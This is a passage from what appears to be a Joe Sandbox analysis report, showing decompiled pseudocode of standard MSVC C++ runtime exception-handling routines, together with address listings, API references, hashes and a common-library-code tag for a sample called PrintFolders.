				void* _t268;
				void* _t269;
				signed int _t273;
				signed char* _t274;
				intOrPtr* _t275;
				signed char _t276;
				signed int _t277;
				signed int _t278;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				signed int _t298;
				signed int _t300;
				signed char* _t301;
				signed int _t302;
				signed int _t303;
				signed int* _t305;
				signed char* _t308;
				signed int _t318;
				signed int _t319;
				signed int _t321;
				signed int _t330;
				void* _t332;
				void* _t334;
				void* _t335;
				void* _t336;
				void* _t337;

				_t300 = __edx;
				_push(_t319);
				_t305 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t279 = E10005B88(_a8, _a16, _t305);
				_t335 = _t334 + 0xc;
				_v12 = _t279;
				if(_t279 < 0xffffffff || _t279 >= _t305[1]) {
					L66:
					_t202 = E100076E4(_t274, _t279, _t300, _t305, _t319);
					asm("int3");
					_t332 = _t335;
					_t336 = _t335 - 0x38;
					_push(_t274);
					_t275 = _v112;
					__eflags =  *_t275 - 0x80000003;
					if( *_t275 == 0x80000003) {
						return _t202;
					} else {
						_push(_t319);
						_push(_t305);
						_t203 = E100048DC(_t275, _t279, _t300, _t305, _t319);
						__eflags =  *(_t203 + 8);
						if( *(_t203 + 8) != 0) {
							__imp__EncodePointer(0);
							_t319 = _t203;
							_t223 = E100048DC(_t275, _t279, _t300, 0, _t319);
							__eflags =  *((intOrPtr*)(_t223 + 8)) - _t319;
							if( *((intOrPtr*)(_t223 + 8)) != _t319) {
								__eflags =  *_t275 - 0xe0434f4d;
								if( *_t275 != 0xe0434f4d) {
									__eflags =  *_t275 - 0xe0434352;
									if( *_t275 != 0xe0434352) {
										_t215 = E10003F46(_t300, 0, _t319, _t275, _a4, _a8, _a12, _a16, _a24, _a28);
										_t336 = _t336 + 0x1c;
										__eflags = _t215;
										if(_t215 != 0) {
											L83:
											return _t215;
										}
									}
								}
							}
						}
						_t204 = _a16;
						_v28 = _t204;
						_v24 = 0;
						__eflags =  *(_t204 + 0xc);
						if( *(_t204 + 0xc) > 0) {
							_push(_a24);
							E10003E79(_t275, _t279, 0, _t319,  &_v44,  &_v28, _a20, _a12, _t204);
							_t302 = _v40;
							_t337 = _t336 + 0x18;
							_t215 = _v44;
							_v20 = _t215;
							_v12 = _t302;
							__eflags = _t302 - _v32;
							if(_t302 >= _v32) {
								goto L83;
							}
							_t281 = _t302 * 0x14;
							__eflags = _t281;
							_v16 = _t281;
							do {
								_t282 = 5;
								_t218 = memcpy( &_v64,  *((intOrPtr*)( *_t215 + 0x10)) + _t281, _t282 << 2);
								_t337 = _t337 + 0xc;
								__eflags = _v64 - _t218;
								if(_v64 > _t218) {
									goto L82;
								}
								__eflags = _t218 - _v60;
								if(_t218 > _v60) {
									goto L82;
								}
								_t221 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t287 = _t221[4];
								__eflags = _t287;
								if(_t287 == 0) {
									L80:
									__eflags =  *_t221 & 0x00000040;
									if(( *_t221 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E10004BA1(_t302, _t275, _a4, _a8, _a12, _a16, _t221, 0,  &_v64, _a24, _a28);
										_t302 = _v12;
										_t337 = _t337 + 0x30;
									}
									goto L82;
								}
								__eflags =  *((char*)(_t287 + 8));
								if( *((char*)(_t287 + 8)) != 0) {
									goto L82;
								}
								goto L80;
								L82:
								_t302 = _t302 + 1;
								_t215 = _v20;
								_t281 = _v16 + 0x14;
								_v12 = _t302;
								_v16 = _t281;
								__eflags = _t302 - _v32;
							} while (_t302 < _v32);
							goto L83;
						}
						E100076E4(_t275, _t279, _t300, 0, _t319);
						asm("int3");
						_push(_t332);
						_t301 = _v184;
						_push(_t275);
						_push(_t319);
						_push(0);
						_t206 = _t301[4];
						__eflags = _t206;
						if(_t206 == 0) {
							L108:
							_t208 = 1;
							__eflags = 1;
						} else {
							_t280 = _t206 + 8;
							__eflags =  *_t280;
							if( *_t280 == 0) {
								goto L108;
							} else {
								__eflags =  *_t301 & 0x00000080;
								_t308 = _v0;
								if(( *_t301 & 0x00000080) == 0) {
									L90:
									_t276 = _t308[4];
									_t321 = 0;
									__eflags = _t206 - _t276;
									if(_t206 == _t276) {
										L100:
										__eflags =  *_t308 & 0x00000002;
										if(( *_t308 & 0x00000002) == 0) {
											L102:
											_t209 = _a4;
											__eflags =  *_t209 & 0x00000001;
											if(( *_t209 & 0x00000001) == 0) {
												L104:
												__eflags =  *_t209 & 0x00000002;
												if(( *_t209 & 0x00000002) == 0) {
													L106:
													_t321 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t301 & 0x00000002;
													if(( *_t301 & 0x00000002) != 0) {
														goto L106;
													}
												}
											} else {
												__eflags =  *_t301 & 0x00000001;
												if(( *_t301 & 0x00000001) != 0) {
													goto L104;
												}
											}
										} else {
											__eflags =  *_t301 & 0x00000008;
											if(( *_t301 & 0x00000008) != 0) {
												goto L102;
											}
										}
										_t208 = _t321;
									} else {
										_t185 = _t276 + 8; // 0x6e
										_t210 = _t185;
										while(1) {
											_t277 =  *_t280;
											__eflags = _t277 -  *_t210;
											if(_t277 !=  *_t210) {
												break;
											}
											__eflags = _t277;
											if(_t277 == 0) {
												L96:
												_t211 = _t321;
											} else {
												_t278 =  *((intOrPtr*)(_t280 + 1));
												__eflags = _t278 -  *((intOrPtr*)(_t210 + 1));
												if(_t278 !=  *((intOrPtr*)(_t210 + 1))) {
													break;
												} else {
													_t280 = _t280 + 2;
													_t210 = _t210 + 2;
													__eflags = _t278;
													if(_t278 != 0) {
														continue;
													} else {
														goto L96;
													}
												}
											}
											L98:
											__eflags = _t211;
											if(_t211 == 0) {
												goto L100;
											} else {
												_t208 = 0;
											}
											goto L109;
										}
										asm("sbb eax, eax");
										_t211 = _t210 | 0x00000001;
										__eflags = _t211;
										goto L98;
									}
								} else {
									__eflags =  *_t308 & 0x00000010;
									if(( *_t308 & 0x00000010) != 0) {
										goto L108;
									} else {
										goto L90;
									}
								}
							}
						}
						L109:
						return _t208;
					}
				} else {
					_t274 = _a4;
					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
						L22:
						_t300 = _a12;
						_v8 = _t300;
						goto L24;
					} else {
						_t319 = 0;
						if(_t274[0x1c] != 0) {
							goto L22;
						} else {
							_t225 = E100048DC(_t274, _t279, _t300, _t305, 0);
							if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
								L60:
								return _t225;
							} else {
								_t274 =  *(E100048DC(_t274, _t279, _t300, _t305, 0) + 0x10);
								_t263 = E100048DC(_t274, _t279, _t300, _t305, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t263 + 0x14));
								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t319) {
									goto L66;
								} else {
									if( *((intOrPtr*)(E100048DC(_t274, _t279, _t300, _t305, _t319) + 0x1c)) == _t319) {
										L23:
										_t300 = _v8;
										_t279 = _v12;
										L24:
										_v52 = _t305;
										_v48 = 0;
										__eflags =  *_t274 - 0xe06d7363;
										if( *_t274 != 0xe06d7363) {
											L56:
											__eflags = _t305[3];
											if(_t305[3] <= 0) {
												goto L59;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L66;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t279);
													_push(_t305);
													_push(_a16);
													_push(_t300);
													_push(_a8);
													_push(_t274);
													L67();
													_t335 = _t335 + 0x20;
													goto L59;
												}
											}
										} else {
											__eflags = _t274[0x10] - 3;
											if(_t274[0x10] != 3) {
												goto L56;
											} else {
												__eflags = _t274[0x14] - 0x19930520;
												if(_t274[0x14] == 0x19930520) {
													L29:
													_t319 = _a32;
													__eflags = _t305[3];
													if(_t305[3] > 0) {
														_push(_a28);
														E10003E79(_t274, _t279, _t305, _t319,  &_v68,  &_v52, _t279, _a16, _t305);
														_t300 = _v64;
														_t335 = _t335 + 0x18;
														_t250 = _v68;
														_v44 = _t250;
														_v16 = _t300;
														__eflags = _t300 - _v56;
														if(_t300 < _v56) {
															_t294 = _t300 * 0x14;
															__eflags = _t294;
															_v32 = _t294;
															do {
																_t295 = 5;
																_t253 = memcpy( &_v104,  *((intOrPtr*)( *_t250 + 0x10)) + _t294, _t295 << 2);
																_t335 = _t335 + 0xc;
																__eflags = _v104 - _t253;
																if(_v104 <= _t253) {
																	__eflags = _t253 - _v100;
																	if(_t253 <= _v100) {
																		_t298 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t255 =  *(_t274[0x1c] + 0xc);
																			_t303 =  *_t255;
																			_t256 =  &(_t255[1]);
																			__eflags = _t256;
																			_v36 = _t256;
																			_t257 = _v88;
																			_v40 = _t303;
																			_v24 = _t257;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t318 = _v36;
																				_t330 = _t303;
																				__eflags = _t330;
																				if(_t330 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t274[0x1c]);
																						_t258 =  &_v84;
																						_push( *_t318);
																						_push(_t258);
																						L86();
																						_t335 = _t335 + 0xc;
																						__eflags = _t258;
																						if(_t258 != 0) {
																							break;
																						}
																						_t330 = _t330 - 1;
																						_t318 = _t318 + 4;
																						__eflags = _t330;
																						if(_t330 > 0) {
																							continue;
																						} else {
																							_t298 = _v20;
																							_t257 = _v24;
																							_t303 = _v40;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E10004BA1(_t303, _t274, _a8, _v8, _a16, _a20,  &_v84,  *_t318,  &_v104, _a28, _a32);
																					_t335 = _t335 + 0x30;
																				}
																				L43:
																				_t300 = _v16;
																				goto L44;
																				L40:
																				_t298 = _t298 + 1;
																				_t257 = _t257 + 0x10;
																				_v20 = _t298;
																				_v24 = _t257;
																				__eflags = _t298 - _v92;
																			} while (_t298 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t300 = _t300 + 1;
																_t250 = _v44;
																_t294 = _v32 + 0x14;
																_v16 = _t300;
																_v32 = _t294;
																__eflags = _t300 - _v56;
															} while (_t300 < _v56);
															_t305 = _a20;
															_t319 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E1000422F(_t274, _t305, _t319, __eflags);
														_t279 = _t274;
													}
													__eflags = ( *_t305 & 0x1fffffff) - 0x19930521;
													if(( *_t305 & 0x1fffffff) < 0x19930521) {
														L59:
														_t225 = E100048DC(_t274, _t279, _t300, _t305, _t319);
														__eflags =  *(_t225 + 0x1c);
														if( *(_t225 + 0x1c) != 0) {
															goto L66;
														} else {
															goto L60;
														}
													} else {
														__eflags = _t305[7];
														if(_t305[7] != 0) {
															L52:
															_t229 = _t305[8] >> 2;
															__eflags = _t229 & 0x00000001;
															if((_t229 & 0x00000001) == 0) {
																_push(_t305[7]);
																_t230 = E10005630(_t274, _t305, _t319, _t274);
																_pop(_t279);
																__eflags = _t230;
																if(_t230 == 0) {
																	goto L63;
																} else {
																	goto L59;
																}
															} else {
																 *(E100048DC(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
																_t238 = E100048DC(_t274, _t279, _t300, _t305, _t319);
																_t290 = _v8;
																 *((intOrPtr*)(_t238 + 0x14)) = _v8;
																goto L61;
															}
														} else {
															_t245 = _t305[8] >> 2;
															__eflags = _t245 & 0x00000001;
															if((_t245 & 0x00000001) == 0) {
																goto L59;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L59;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _t274[0x14] - 0x19930521;
													if(_t274[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t274[0x14] - 0x19930522;
														if(_t274[0x14] != 0x19930522) {
															goto L56;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E100048DC(_t274, _t279, _t300, _t305, _t319) + 0x1c));
										_t268 = E100048DC(_t274, _t279, _t300, _t305, _t319);
										_push(_v16);
										 *(_t268 + 0x1c) = _t319;
										_t269 = E10005630(_t274, _t305, _t319, _t274);
										_pop(_t290);
										if(_t269 != 0) {
											goto L23;
										} else {
											_t305 = _v16;
											_t356 =  *_t305 - _t319;
											if( *_t305 <= _t319) {
												L61:
												E100076A8(_t274, _t290, _t300, _t305, _t319, __eflags);
											} else {
												while(1) {
													_t290 =  *((intOrPtr*)(_t319 + _t305[1] + 4));
													if(E100052C4( *((intOrPtr*)(_t319 + _t305[1] + 4)), _t356, 0x100178d0) != 0) {
														goto L62;
													}
													_t319 = _t319 + 0x10;
													_t273 = _v20 + 1;
													_v20 = _t273;
													_t356 = _t273 -  *_t305;
													if(_t273 >=  *_t305) {
														goto L61;
													} else {
														continue;
													}
													goto L62;
												}
											}
											L62:
											_push(1);
											_push(_t274);
											E1000422F(_t274, _t305, _t319, __eflags);
											_t279 =  &_v64;
											E100052AC( &_v64);
											E10004458( &_v64, 0x1001589c);
											L63:
											 *(E100048DC(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
											_t232 = E100048DC(_t274, _t279, _t300, _t305, _t319);
											_t279 = _v8;
											 *(_t232 + 0x14) = _v8;
											__eflags = _t319;
											if(_t319 == 0) {
												_t319 = _a8;
											}
											E1000406C(_t279, _t319, _t274);
											E10005530(_a8, _a16, _t305);
											_t235 = E100056ED(_t305);
											_t335 = _t335 + 0x10;
											_push(_t235);
											E100054A7(_t274, _t279, _t300, _t305, _t319, __eflags);
											goto L66;
										}
									}
								}
							}
						}
					}
				}
			}

0x10004c21
0x10004c28
0x10004c2a
0x10004c33
0x10004c39
0x10004c41
0x10004c43
0x10004c46
0x10004c4c
0x10004fc5
0x10004fc5
0x10004fca
0x10004fcc
0x10004fce
0x10004fd1
0x10004fd2
0x10004fd5
0x10004fdb
0x100050fa
0x10004fe1
0x10004fe1
0x10004fe2
0x10004fe3
0x10004fea
0x10004fed
0x10004ff0
0x10004ff6
0x10004ff8
0x10004ffd
0x10005000
0x10005002
0x10005008
0x1000500a
0x10005010
0x10005025
0x1000502a
0x1000502d
0x1000502f
0x100050f6
0x00000000
0x100050f7
0x1000502f
0x10005010
0x10005008
0x10005000
0x10005035
0x10005038
0x1000503b
0x1000503e
0x10005041
0x10005047
0x10005059
0x1000505e
0x10005061
0x10005064
0x10005067
0x1000506a
0x1000506d
0x10005070
0x00000000
0x00000000
0x10005076
0x10005076
0x10005079
0x1000507c
0x1000508b
0x1000508c
0x1000508c
0x1000508e
0x10005091
0x00000000
0x00000000
0x10005093
0x10005096
0x00000000
0x00000000
0x100050a4
0x100050a6
0x100050a9
0x100050ab
0x100050b3
0x100050b3
0x100050b6
0x100050b8
0x100050ba
0x100050d6
0x100050db
0x100050de
0x100050de
0x00000000
0x100050b6
0x100050ad
0x100050b1
0x00000000
0x00000000
0x00000000
0x100050e1
0x100050e4
0x100050e5
0x100050e8
0x100050eb
0x100050ee
0x100050f1
0x100050f1
0x00000000
0x1000507c
0x100050fb
0x10005100
0x10005101
0x10005104
0x10005107
0x10005108
0x10005109
0x1000510a
0x1000510d
0x1000510f
0x10005187
0x10005189
0x10005189
0x10005111
0x10005111
0x10005114
0x10005117
0x00000000
0x10005119
0x10005119
0x1000511c
0x1000511f
0x10005126
0x10005126
0x10005129
0x1000512b
0x1000512d
0x1000515f
0x1000515f
0x10005162
0x10005169
0x10005169
0x1000516c
0x1000516f
0x10005176
0x10005176
0x10005179
0x10005180
0x10005182
0x10005182
0x1000517b
0x1000517b
0x1000517e
0x00000000
0x00000000
0x1000517e
0x10005171
0x10005171
0x10005174
0x00000000
0x00000000
0x10005174
0x10005164
0x10005164
0x10005167
0x00000000
0x00000000
0x10005167
0x10005183
0x1000512f
0x1000512f
0x1000512f
0x10005132
0x10005132
0x10005134
0x10005136
0x00000000
0x00000000
0x10005138
0x1000513a
0x1000514e
0x1000514e
0x1000513c
0x1000513c
0x1000513f
0x10005142
0x00000000
0x10005144
0x10005144
0x10005147
0x1000514a
0x1000514c
0x00000000
0x00000000
0x00000000
0x00000000
0x1000514c
0x10005142
0x10005157
0x10005157
0x10005159
0x00000000
0x1000515b
0x1000515b
0x1000515b
0x00000000
0x10005159
0x10005152
0x10005154
0x10005154
0x00000000
0x10005154
0x10005121
0x10005121
0x10005124
0x00000000
0x00000000
0x00000000
0x00000000
0x10005124
0x1000511f
0x10005117
0x1000518a
0x1000518e
0x1000518e
0x10004c5b
0x10004c5b
0x10004c64
0x10004d61
0x10004d61
0x10004d64
0x00000000
0x10004c93
0x10004c93
0x10004c98
0x00000000
0x10004c9e
0x10004c9e
0x10004ca6
0x10004f5f
0x10004f63
0x10004cac
0x10004cb1
0x10004cb4
0x10004cb9
0x10004cc0
0x10004cc5
0x00000000
0x10004cfd
0x10004d05
0x10004d69
0x10004d69
0x10004d6c
0x10004d6f
0x10004d71
0x10004d74
0x10004d77
0x10004d7d
0x10004f2e
0x10004f2e
0x10004f31
0x00000000
0x10004f33
0x10004f33
0x10004f36
0x00000000
0x10004f3c
0x10004f3c
0x10004f3f
0x10004f42
0x10004f43
0x10004f44
0x10004f47
0x10004f48
0x10004f4b
0x10004f4c
0x10004f51
0x00000000
0x10004f51
0x10004f36
0x10004d83
0x10004d83
0x10004d87
0x00000000
0x10004d8d
0x10004d8d
0x10004d94
0x10004dac
0x10004dac
0x10004daf
0x10004db2
0x10004db8
0x10004dc8
0x10004dcd
0x10004dd0
0x10004dd3
0x10004dd6
0x10004dd9
0x10004ddc
0x10004ddf
0x10004de5
0x10004de5
0x10004de8
0x10004deb
0x10004dfa
0x10004dfb
0x10004dfb
0x10004dfd
0x10004e00
0x10004e06
0x10004e09
0x10004e0f
0x10004e11
0x10004e14
0x10004e17
0x10004e20
0x10004e23
0x10004e25
0x10004e25
0x10004e28
0x10004e2b
0x10004e2e
0x10004e31
0x10004e34
0x10004e39
0x10004e3a
0x10004e3b
0x10004e3c
0x10004e3d
0x10004e40
0x10004e42
0x10004e44
0x00000000
0x10004e46
0x10004e46
0x10004e46
0x10004e49
0x10004e4c
0x10004e4e
0x10004e4f
0x10004e54
0x10004e57
0x10004e59
0x00000000
0x00000000
0x10004e5b
0x10004e5c
0x10004e5f
0x10004e61
0x00000000
0x10004e63
0x10004e63
0x10004e66
0x10004e69
0x00000000
0x10004e69
0x00000000
0x10004e61
0x10004e7d
0x10004e83
0x10004ea0
0x10004ea5
0x10004ea5
0x10004ea8
0x10004ea8
0x00000000
0x10004e6c
0x10004e6c
0x10004e6d
0x10004e70
0x10004e73
0x10004e76
0x10004e76
0x00000000
0x10004e7b
0x10004e17
0x10004e09
0x10004eab
0x10004eae
0x10004eaf
0x10004eb2
0x10004eb5
0x10004eb8
0x10004ebb
0x10004ebb
0x10004ec4
0x10004ec7
0x10004ec7
0x10004ddf
0x10004eca
0x10004ece
0x10004ed0
0x10004ed3
0x10004ed9
0x10004ed9
0x10004ee1
0x10004ee6
0x10004f54
0x10004f54
0x10004f59
0x10004f5d
0x00000000
0x00000000
0x00000000
0x00000000
0x10004ee8
0x10004ee8
0x10004eec
0x10004efe
0x10004f01
0x10004f04
0x10004f06
0x10004f1d
0x10004f21
0x10004f27
0x10004f28
0x10004f2a
0x00000000
0x10004f2c
0x00000000
0x10004f2c
0x10004f08
0x10004f0d
0x10004f10
0x10004f15
0x10004f18
0x00000000
0x10004f18
0x10004eee
0x10004ef1
0x10004ef4
0x10004ef6
0x00000000
0x10004ef8
0x10004ef8
0x10004efc
0x00000000
0x00000000
0x00000000
0x00000000
0x10004efc
0x10004ef6
0x10004eec
0x10004d96
0x10004d96
0x10004d9d
0x00000000
0x10004d9f
0x10004d9f
0x10004da6
0x00000000
0x00000000
0x00000000
0x00000000
0x10004da6
0x10004d9d
0x10004d94
0x10004d87
0x10004d07
0x10004d0f
0x10004d12
0x10004d17
0x10004d1b
0x10004d1e
0x10004d24
0x10004d27
0x00000000
0x10004d29
0x10004d29
0x10004d2c
0x10004d2e
0x10004f64
0x10004f64
0x00000000
0x10004d34
0x10004d3c
0x10004d47
0x00000000
0x00000000
0x10004d50
0x10004d53
0x10004d54
0x10004d57
0x10004d59
0x00000000
0x10004d5f
0x00000000
0x10004d5f
0x00000000
0x10004d59
0x10004d34
0x10004f69
0x10004f69
0x10004f6b
0x10004f6c
0x10004f73
0x10004f76
0x10004f84
0x10004f89
0x10004f8e
0x10004f91
0x10004f96
0x10004f99
0x10004f9c
0x10004f9e
0x10004fa0
0x10004fa0
0x10004fa5
0x10004fb1
0x10004fb7
0x10004fbc
0x10004fbf
0x10004fc0
0x00000000
0x10004fc0
0x10004d27
0x10004d05
0x10004cc5
0x10004ca6
0x10004c98
0x10004c64

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 10004D1E
type_info::operator==.LIBVCRUNTIME ref: 10004D40
___TypeMatch.LIBVCRUNTIME ref: 10004E4F
IsInExceptionSpec.LIBVCRUNTIME ref: 10004F21
_UnwindNestedFrames.LIBCMT ref: 10004FA5
CallUnexpected.LIBVCRUNTIME ref: 10004FC0

Strings

csm, xrefs: 10004CCB
csm, xrefs: 10004D77
csm, xrefs: 10004C5E

Memory Dump Source

Source File: 00000002.00000002.326460873.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.326456208.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326476703.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326484657.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326522758.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_PrintFolders.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: c280cf51245476ab5a6ca9c2466aed320dec0198e46a52e5e0ca7a664b3de09a
Instruction ID: 240bac43b3023af98cd0cad224976453cf76ecf695f899d999e54e670dd59ab9
Opcode Fuzzy Hash: c280cf51245476ab5a6ca9c2466aed320dec0198e46a52e5e0ca7a664b3de09a
Instruction Fuzzy Hash: 98B1A0B5C0024AEFEF14CF94C88199E77B5FF04391F12416AE8156B21ADB31EA51CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00412112 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E00412112(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t202;
				signed int _t203;
				char _t204;
				signed int _t206;
				signed int _t208;
				signed char* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t215;
				void* _t218;
				signed char* _t221;
				void* _t223;
				void* _t225;
				signed char _t229;
				signed int _t230;
				void* _t232;
				void* _t235;
				void* _t238;
				signed char _t245;
				signed int _t250;
				void* _t253;
				signed int* _t255;
				signed int _t256;
				intOrPtr _t257;
				signed int _t258;
				void* _t263;
				void* _t268;
				void* _t269;
				signed int _t273;
				signed char* _t274;
				intOrPtr* _t275;
				signed char _t276;
				signed int _t277;
				signed int _t278;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				signed int _t298;
				signed int _t300;
				signed char* _t301;
				signed int _t302;
				signed int _t303;
				signed int* _t305;
				signed char* _t308;
				signed int _t318;
				signed int _t319;
				signed int _t321;
				signed int _t330;
				void* _t332;
				void* _t334;
				void* _t335;
				void* _t336;
				void* _t337;

				_t300 = __edx;
				_push(_t319);
				_t305 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t279 = E004131AD(_a8, _a16, _t305);
				_t335 = _t334 + 0xc;
				_v12 = _t279;
				if(_t279 < 0xffffffff || _t279 >= _t305[1]) {
					L66:
					_t202 = E00419C49(_t274, _t279, _t300, _t305, _t319);
					asm("int3");
					_t332 = _t335;
					_t336 = _t335 - 0x38;
					_push(_t274);
					_t275 = _v112;
					__eflags =  *_t275 - 0x80000003;
					if( *_t275 == 0x80000003) {
						return _t202;
					} else {
						_t203 = E00411D96(_t275, _t279, _t300, _t305, _t319, _t305, _t319);
						__eflags =  *(_t203 + 8);
						if( *(_t203 + 8) != 0) {
							__imp__EncodePointer(0);
							_t319 = _t203;
							_t223 = E00411D96(_t275, _t279, _t300, 0, _t319);
							__eflags =  *((intOrPtr*)(_t223 + 8)) - _t319;
							if( *((intOrPtr*)(_t223 + 8)) != _t319) {
								__eflags =  *_t275 - 0xe0434f4d;
								if( *_t275 != 0xe0434f4d) {
									__eflags =  *_t275 - 0xe0434352;
									if( *_t275 != 0xe0434352) {
										_t215 = E0040FC88(_t300, 0, _t319, _t275, _a4, _a8, _a12, _a16, _a24, _a28);
										_t336 = _t336 + 0x1c;
										__eflags = _t215;
										if(_t215 != 0) {
											L83:
											return _t215;
										}
									}
								}
							}
						}
						_t204 = _a16;
						_v28 = _t204;
						_v24 = 0;
						__eflags =  *(_t204 + 0xc);
						if( *(_t204 + 0xc) > 0) {
							_push(_a24);
							E0040FBBB(_t275, _t279, 0, _t319,  &_v44,  &_v28, _a20, _a12, _t204);
							_t302 = _v40;
							_t337 = _t336 + 0x18;
							_t215 = _v44;
							_v20 = _t215;
							_v12 = _t302;
							__eflags = _t302 - _v32;
							if(_t302 >= _v32) {
								goto L83;
							}
							_t281 = _t302 * 0x14;
							__eflags = _t281;
							_v16 = _t281;
							do {
								_t282 = 5;
								_t218 = memcpy( &_v64,  *((intOrPtr*)( *_t215 + 0x10)) + _t281, _t282 << 2);
								_t337 = _t337 + 0xc;
								__eflags = _v64 - _t218;
								if(_v64 > _t218) {
									goto L82;
								}
								__eflags = _t218 - _v60;
								if(_t218 > _v60) {
									goto L82;
								}
								_t221 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t287 = _t221[4];
								__eflags = _t287;
								if(_t287 == 0) {
									L80:
									__eflags =  *_t221 & 0x00000040;
									if(( *_t221 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E00412092(_t302, _t275, _a4, _a8, _a12, _a16, _t221, 0,  &_v64, _a24, _a28);
										_t302 = _v12;
										_t337 = _t337 + 0x30;
									}
									goto L82;
								}
								__eflags =  *((char*)(_t287 + 8));
								if( *((char*)(_t287 + 8)) != 0) {
									goto L82;
								}
								goto L80;
								L82:
								_t302 = _t302 + 1;
								_t215 = _v20;
								_t281 = _v16 + 0x14;
								_v12 = _t302;
								_v16 = _t281;
								__eflags = _t302 - _v32;
							} while (_t302 < _v32);
							goto L83;
						}
						E00419C49(_t275, _t279, _t300, 0, _t319);
						asm("int3");
						_push(_t332);
						_t301 = _v184;
						_push(_t275);
						_push(_t319);
						_push(0);
						_t206 = _t301[4];
						__eflags = _t206;
						if(_t206 == 0) {
							L108:
							_t208 = 1;
							__eflags = 1;
						} else {
							_t280 = _t206 + 8;
							__eflags =  *_t280;
							if( *_t280 == 0) {
								goto L108;
							} else {
								__eflags =  *_t301 & 0x00000080;
								_t308 = _v0;
								if(( *_t301 & 0x00000080) == 0) {
									L90:
									_t276 = _t308[4];
									_t321 = 0;
									__eflags = _t206 - _t276;
									if(_t206 == _t276) {
										L100:
										__eflags =  *_t308 & 0x00000002;
										if(( *_t308 & 0x00000002) == 0) {
											L102:
											_t209 = _a4;
											__eflags =  *_t209 & 0x00000001;
											if(( *_t209 & 0x00000001) == 0) {
												L104:
												__eflags =  *_t209 & 0x00000002;
												if(( *_t209 & 0x00000002) == 0) {
													L106:
													_t321 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t301 & 0x00000002;
													if(( *_t301 & 0x00000002) != 0) {
														goto L106;
													}
												}
											} else {
												__eflags =  *_t301 & 0x00000001;
												if(( *_t301 & 0x00000001) != 0) {
													goto L104;
												}
											}
										} else {
											__eflags =  *_t301 & 0x00000008;
											if(( *_t301 & 0x00000008) != 0) {
												goto L102;
											}
										}
										_t208 = _t321;
									} else {
										_t185 = _t276 + 8; // 0x6e
										_t210 = _t185;
										while(1) {
											_t277 =  *_t280;
											__eflags = _t277 -  *_t210;
											if(_t277 !=  *_t210) {
												break;
											}
											__eflags = _t277;
											if(_t277 == 0) {
												L96:
												_t211 = _t321;
											} else {
												_t278 =  *((intOrPtr*)(_t280 + 1));
												__eflags = _t278 -  *((intOrPtr*)(_t210 + 1));
												if(_t278 !=  *((intOrPtr*)(_t210 + 1))) {
													break;
												} else {
													_t280 = _t280 + 2;
													_t210 = _t210 + 2;
													__eflags = _t278;
													if(_t278 != 0) {
														continue;
													} else {
														goto L96;
													}
												}
											}
											L98:
											__eflags = _t211;
											if(_t211 == 0) {
												goto L100;
											} else {
												_t208 = 0;
											}
											goto L109;
										}
										asm("sbb eax, eax");
										_t211 = _t210 | 0x00000001;
										__eflags = _t211;
										goto L98;
									}
								} else {
